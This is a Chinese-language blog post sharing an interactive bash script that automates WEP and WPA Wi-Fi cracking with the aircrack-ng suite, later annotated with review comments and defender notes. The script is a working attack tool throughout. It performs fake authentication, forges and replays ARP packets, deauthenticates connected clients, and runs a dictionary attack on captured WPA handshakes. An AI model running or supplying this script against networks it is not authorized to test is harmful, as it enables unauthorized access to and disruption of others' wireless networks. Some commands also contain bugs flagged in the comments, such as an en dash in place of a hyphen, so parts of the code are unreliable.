破解 WEP/WPA 脚本

对之前的 WEP 破解脚本进行了完善,添加了破解 WPA 的代码。

脚本放在google doc了。

gentoo-pjq 320 # cat crack.sh
#########################################################################
# Author: pengjianqing@gmail.com
# Created Time: Fri 09 Oct 2009 09:37:43 PM CST
# File Name: crack.sh
# Description:Welcome to visit:www.impjq.net for more information.
#Referece:http://www.cbifamily.com/hard/harddim/2009-05-13/1242203280d86121.html
#########################################################################
#!/bin/bash
 
# Settings (read as globals by every function below)
# 802.11 channel handed to airmon-ng and to airodump-ng -c.
CHANNEL="6"
# Scratch file for airodump-ng output; a relative name, so it is created in
# the current working directory and deleted again by clean().
TMP="tmp.txt"
# Wordlist path passed to aircrack-ng -w in crackwap().
PASSWDTXT="/media/sdb9/superdic.txt"
# Value passed to aircrack-ng -n (WEP key length in bits) in getwepkey().
ENCRYPTTYPE="64"
 
 
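# clean: remove artefacts left by earlier runs from the current directory.
# Globals:   TMP (read) - scratch file name
# Deletes:   *.cap, fragment*.xor, *.ivs, *.csv, *.netxml and ${TMP} in the cwd
# Returns:   exit status of the last rm that ran
# NOTE(review): the globs are not limited to files this script created; any
# capture or CSV file that happens to sit in the working directory is removed
# as well.
clean()
{
    # -f: on a first run nothing matches, and a missing file is not an error.
    # --: a file name starting with '-' is handled as a name, never as an
    #     option to rm.
    rm -f -- *.cap fragment*.xor *.ivs *.csv *.netxml

    # Quoted so a scratch name containing spaces is removed as one file;
    # skipped entirely when TMP is empty or unset.
    if [ -n "${TMP:-}" ]; then
        rm -f -- "${TMP}"
    fi
}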
 
 
 
# getwepkey: run aircrack-ng against a captured IV file named by the operator.
# Globals:   AP_MAC (read; assigned in crackwep/crackwap), ENCRYPTTYPE (read),
#            RESULT (written), TYPE (read in one message only)
# Input:     capture file name typed at the prompt
# Note:      the only call site visible in this listing is commented out at
#            the end of crackwep().
getwepkey()
{
    # The hint hard-codes "-n 64" and "crackwep-01.ivs"; the command that is
    # actually run below uses ${ENCRYPTTYPE} and the name typed at the prompt.
    echo "Run:aircrack-ng -n 64 -b ${AP_MAC} crackwep-01.ivs to get the key!"
    echo "**************************************************************************"
    echo "Get the key:"
    # List the IV captures in the cwd, newest first, so one can be picked.
    ls -lht *.ivs
    read -p "Input the pack file name,like:crackwep-01.ivs" RESULT
    # NOTE(review): ${TYPE} is not assigned anywhere in this listing, so the
    # echoed command shows an empty -n value; the real call uses ${ENCRYPTTYPE}.
    echo "aircrack-ng -n ${TYPE} -b ${AP_MAC} ${RESULT}"
    # -n: WEP key length in bits, -b: BSSID of the access point.
    # The expansions are unquoted, so a file name containing spaces or glob
    # characters is split/expanded by the shell before aircrack-ng sees it.
    aircrack-ng -n ${ENCRYPTTYPE} -b ${AP_MAC} ${RESULT}
}
 
# crackwep: interactive walk-through of WEP key recovery against one access
# point, driving the aircrack-ng suite on monitor interface mon0.
# Globals:   CHANNEL, TMP (read); ESSID, AP_MAC, PC_MAC, RESULT (written)
# Files:     crackwep-*.ivs (airodump-ng), fragment*.xor (aireplay-ng -5) and
#            mrarp (packetforge-ng), all in the current directory
# Defender view: every step after the initial capture transmits frames (fake
# authentication, fragmentation probes, replayed ARP at 256 packets/s), which
# is what a wireless IDS would observe. WEP has no configuration that resists
# this; the mitigation is moving the network to WPA2/WPA3.
crackwep()
{
    echo "Now choose crackwep()"
    # NOTE(review): the message says "-w pack", the command below writes with
    # the prefix "crackwep".
    echo "Display the details on the Channel:airodump-ng --ivs -w pack -c ${CHANNEL} mon0 &>${TMP}"
    echo "Please wait for about 30 seconds,then Ctrl+C to interrupt it."
    echo "use tail -f ${TMP} to see the details"
    # Runs in the foreground until interrupted; stdout and stderr both go to
    # ${TMP}, so nothing is shown on the terminal while it captures.
    # --ivs: store only initialization vectors, -w: output file prefix.
    airodump-ng --ivs -w crackwep -c ${CHANNEL} mon0 &>${TMP}
    echo "cat ${TMP}"
    cat ${TMP}
 
    read -p "Please input essid:" ESSID
    echo "grep ${ESSID} ${TMP}"
    # Takes the second space-separated field of the first line that matches
    # the ESSID as the BSSID.
    # NOTE(review): ${ESSID} is unquoted and used as a grep pattern, so an
    # ESSID containing spaces or regex metacharacters is mis-parsed; the field
    # position also depends on the exact airodump-ng screen layout - confirm.
    AP_MAC=`grep ${ESSID} ${TMP}|cut -d " " -f2|head -n 1`
    echo "AP_MAC:${AP_MAC}"
 
    # Local adapter MAC, taken from field 10 of the wlan0 line of ifconfig.
    # NOTE(review): presumably matches one specific ifconfig output format;
    # an empty PC_MAC is not detected before it is used below.
    PC_MAC=`ifconfig|grep wlan0|cut -d " " -f10|head -n 1`
    echo "PC_MAC:${PC_MAC}"
 
    # aireplay-ng -1 0: fake authentication/association with the AP
    # (-e ESSID, -a BSSID, -h source MAC).
    echo "欺骗模式:aireplay-ng -1 0 -e ${ESSID} -a ${AP_MAC} -h ${PC_MAC} mon0"
    aireplay-ng -1 0 -e ${ESSID} -a ${AP_MAC} -h ${PC_MAC} mon0
    # The answer is stored but never checked; the flow continues either way.
    read -p "Association successful?:(y/n):" RESULT
 
    # aireplay-ng -5: fragmentation mode; on success it leaves a keystream
    # file named fragment-*.xor in the current directory.
    echo "aireplay-ng -5 -b ${AP_MAC} -h ${PC_MAC} mon0"
    aireplay-ng -5 -b ${AP_MAC} -h ${PC_MAC} mon0
 
    echo "check whether create the fragment-xxxx-xxxx.xor file?"
    ls -lht *.xor
 
    # Again informational only: RESULT is overwritten and not inspected.
    read -p "Create the fragment-xxxx-xxxx.xor file?(y/n):" RESULT
 
    # packetforge-ng -0: build an ARP request from the keystream
    # (-k destination IP, -l source IP, -y keystream file, -w output file).
    # NOTE(review): fragment*.xor is an unquoted glob; if more than one file
    # matches, the extra names are passed as additional arguments.
    echo "packetforge-ng -0 -a ${AP_MAC} -h ${PC_MAC} -k 255.255.255.255 -l 255.255.255.255 -y fragment*.xor -w mrarp"
    packetforge-ng -0 -a ${AP_MAC} -h ${PC_MAC} -k 255.255.255.255 -l 255.255.255.255 -y fragment*.xor -w mrarp
 
 
    echo "**************************************************************************"
    echo "Now you should run:airodump-ng --ivs -w pack -c ${CHANNEL} mon0 &>${TMP} "
    echo "to check the #Data  grow to 10000"
    echo "**************************************************************************"
    echo "Run:aircrack-ng -n 64 -b ${AP_MAC} crackwep-01.ivs to get the key!"
    echo "**************************************************************************"
    # aireplay-ng -2: interactive replay of the forged packet read from mrarp
    # (-r), at 256 packets per second (-x).
    echo "aireplay-ng -2 -r mrarp -x 256 mon0"
    aireplay-ng -2 -r mrarp -x 256 mon0
 
    # Key recovery is left to the operator (see the hints printed above);
    # the automatic call is disabled.
#    getwepkey
}
 
 
# crackwap: interactive walk-through of a WPA handshake capture followed by a
# dictionary run ("wap" in the names and messages is the author's spelling of
# WPA).
# Globals:   CHANNEL, TMP, PASSWDTXT (read); ESSID, AP_MAC, PC_MAC,
#            STATION_MAC, RESULT (written)
# Files:     crackwap*.cap written by airodump-ng in the current directory
# Defender view: the flow sends forged deauthentication frames to a connected
# client, which a wireless IDS reports as a deauth burst and which 802.11w
# (protected management frames) is designed to reject. The final step only
# succeeds when the passphrase is in the wordlist, so a long random passphrase
# is the effective control.
crackwap()
{
    echo "Now choose crackwap()"
    echo "**************************************************************************"
    echo "Display the details on the Channel:airodump-ng  -w crackwap -c ${CHANNEL} mon0 &>${TMP}"
    echo "Please wait for about 30 seconds,then Ctrl+C to interrupt it."
    echo "**************************************************************************"
    echo "NOTE:Your should start this in another terminal:airodump-ng -w crackwap -c ${CHANNEL} mon0"
    echo "**************************************************************************"
    echo "use tail -f ${TMP} to see the details"
    # NOTE(review): the redirection applies to echo itself, so this line is
    # written into ${TMP} instead of being shown, and the next command then
    # overwrites it.
    echo airodump-ng -w crackwap -c ${CHANNEL} mon0 &>${TMP}
    # Foreground capture until interrupted; all output goes to ${TMP}.
    airodump-ng -w crackwap -c ${CHANNEL} mon0 &>${TMP}
    echo "cat ${TMP}"
    cat ${TMP}
 
    read -p "Please input essid:" ESSID
    echo "grep ${ESSID} ${TMP}"
    # Second space-separated field of the first line matching the ESSID.
    # NOTE(review): unquoted ${ESSID} used as a grep pattern; spaces or regex
    # metacharacters in the name break the lookup.
    AP_MAC=`grep ${ESSID} ${TMP}|cut -d " " -f2|head -n 1`
    echo "AP_MAC:${AP_MAC}"
 
    # Local adapter MAC parsed from ifconfig; printed here but not used by
    # any command later in this function.
    PC_MAC=`ifconfig|grep wlan0|cut -d " " -f10|head -n 1`
    echo "PC_MAC:${PC_MAC}"
 
    # Fourth space-separated field of the first (sorted, de-duplicated) line
    # that contains the AP's MAC.
    # NOTE(review): presumably the client column of airodump-ng's station
    # table - confirm against real output; an empty AP_MAC makes grep treat
    # ${TMP} as the pattern and read stdin.
    STATION_MAC=`grep ${AP_MAC}  ${TMP}|sort|uniq|cut -d " " -f4|head -n 1`
    echo "STATION_MAC:${STATION_MAC}"
 
    read -p "All the MAC is right?(y/n):" RESULT
 
 
    # NOTE(review): in the "n" arm the prompt says AP_MAC but the value is
    # stored in PC_MAC, so AP_MAC keeps the auto-detected value. Any other
    # answer prints "Wrong selection" and the flow still continues.
    case "${RESULT}" in
	"y" ) ;;
	"n" ) echo "Reset the MAC:";read -p "AP_MAC:" PC_MAC;read -p "STATION_MAC:" STATION_MAC;;
 
	*   ) echo "Wrong selection";;
    esac
 
 
    # aireplay-ng -0 10: ten deauthentication bursts addressed to the client
    # (-c) on behalf of the AP (-a), so the client re-authenticates while the
    # capture started in the other terminal is recording.
    echo "aireplay-ng -0 10 -a ${AP_MAC} -c ${STATION_MAC} mon0"
    aireplay-ng -0 10 -a ${AP_MAC} -c ${STATION_MAC} mon0
 
    # Prompt says "*.cab"; the capture files are *.cap. The answer is not
    # checked.
    read -p "Get the *.cab file ok?(y/n):" RESULT
 
    echo "Now Crack the WAP with ${PASSWDTXT}"
    echo "aircrack-ng -w ${PASSWDTXT} -b  ${AP_MAC} crackwap*.cap"
    # NOTE(review): the option on the next line is typed with an en dash
    # rather than an ASCII hyphen, so it does not match the command echoed
    # just above; crackwap*.cap is an unquoted glob over all captures.
    aircrack-ng –w  ${PASSWDTXT} -b  ${AP_MAC} crackwap*.cap
}
 
# menu: print the top-level choices to stdout
# (1 = WEP flow, 2 = WPA flow, q = quit). Reads no input itself.
menu()
{
    printf '%s\n' \
        "Main Menu" \
        "Please choose your action:" \
        "1.wep" \
        "2.wap" \
        "q.quit"
}
 
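# Entry point: clear old artefacts, (re)start the monitor interface, then loop
# on the menu until the operator enters "q" or stdin is closed.

# Deletes captures and scratch files from earlier runs in the cwd.
clean
echo "start wlan0 monitor:airmon-ng start wlan0 ${CHANNEL}"
# Tear down a monitor interface left over from a previous run, then create it
# again on the configured channel.
airmon-ng stop mon0
airmon-ng start wlan0 "${CHANNEL}"
echo "airmon-ng"
# Informational pause only: the answer is stored but never checked.
read -r -p "start monitor ok:y/n?:" RESULT


menu
# On end-of-input behave as if "q" was entered instead of looping forever on
# an empty choice.
read -r -p "Please choose:" CHOOSE || CHOOSE=q


while [ "${CHOOSE}" != "q" ]; do
    # "q" never reaches this case because the loop condition filters it out.
    case "${CHOOSE}" in
        "1" ) crackwep;;
        "2" ) crackwap;;
        *   ) echo "Wrong selection";;
    esac
    menu
    # A failed read (closed stdin) ends the loop; previously CHOOSE stayed
    # empty and the loop printed "Wrong selection" without end.
    read -r -p "Please Select:" CHOOSE || break
    clear

done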
